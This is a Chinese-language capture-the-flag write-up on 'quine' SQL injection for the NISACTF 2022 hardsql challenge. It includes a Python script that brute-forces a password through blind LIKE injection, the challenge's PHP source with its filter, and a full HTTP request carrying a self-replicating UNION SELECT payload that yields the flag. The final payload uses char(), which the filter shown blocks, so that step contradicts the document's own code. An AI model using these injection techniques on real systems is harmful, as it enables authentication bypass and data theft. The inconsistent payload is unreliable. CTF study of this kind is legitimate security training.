quine注入
主要是针对发包端的注入,通过修改放包的查询语句,如果单从脚本方向来看对表的字符爆破是直接可行的。对空表返回一个逻辑自洽的查询语句,使其逻辑符合,这里摆出两道例题
[NISACTF 2022]hardsql
先上fuzz一下,用户名已经给了,那么通常的注入点就是密码,通过抓包表现:就是密码
POST /login.php HTTP/1.1
username=bilala&passwd=12&login=%E7%99%BB%E5%BD%95
反复尝试看看注入的点,看看网站的回显:
因为我们密码错误会回显“wrong password”,waf的话如果我们用了union select正则绕过,那显然就可以排除了,因此我们可以大致地判断条件:
import requests #引入requests模块,如果担心waf的时间检测,请加入time模块
url = 'http://node5.anna.nssctf.cn:26885/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'#初始化字典
flag = ''
for i in range(62):
for j in str:
data = {
'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"#python3的字符串不要忘了括号闭合
}
response = requests.post(url, data=data)
#time.sleep(seconds)
#请求阶段:如果担心waf过滤,则不妨添加时间检测
if "nothing found" not in response.text:
flag = flag + j
print(flag)
break
print(flag)
获得password:b2f2d15b3ae082ca29697d8dcd420fd7,login seccess!
登陆成功:我们看到了源码:
<?php
include_once("config.php");
function alertMes($mes,$url){
//die及弹出检测结果
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
//检查Sql注入,也就是waf
function checkSql($s) {
if(preg_match("/if|regexp|between|in|flag|=|>|<|and|\||right|left|insert|database|reverse|update|extractvalue|floor|join|substr|&|;|\\\$|char|\x0a|\x09|column|sleep|\ /i",$s)){
alertMes('waf here', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['passwd']) && $_POST['passwd'] != '') {
$username=$_POST['username'];
$password=$_POST['passwd'];
if ($username !== 'bilala') {
alertMes('only bilala can login', 'index.php');
}
checkSql($password);
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
$user_result=mysqli_query($MysqlLink,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes('nothing found','index.php');
}
if ($row['passwd'] === $password) {
if($password == 'b2f2d15b3ae082ca29697d8dcd420fd7'){
show_source(__FILE__);
die;
}
else{
die($FLAG);
}
} else {
alertMes("wrong password",'index.php');
}
}
?>
这个其实就是登陆完成后的源码逻辑,那我们现在的目标是die($FLAG),我们这样构造payload:
/login.php HTTP/1.1
Host: node5.anna.nssctf.cn:26885
Content-Length: 50
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://node5.anna.nssctf.cn:26885
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node5.anna.nssctf.cn:26885/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
username=bilala&passwd='/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#&login=%E7%99%BB%E5%BD%95
获得flag:NSSCTF{62cafc54-83da-4bb5-a358-0da099ae10de}
0x、char、chr三个等价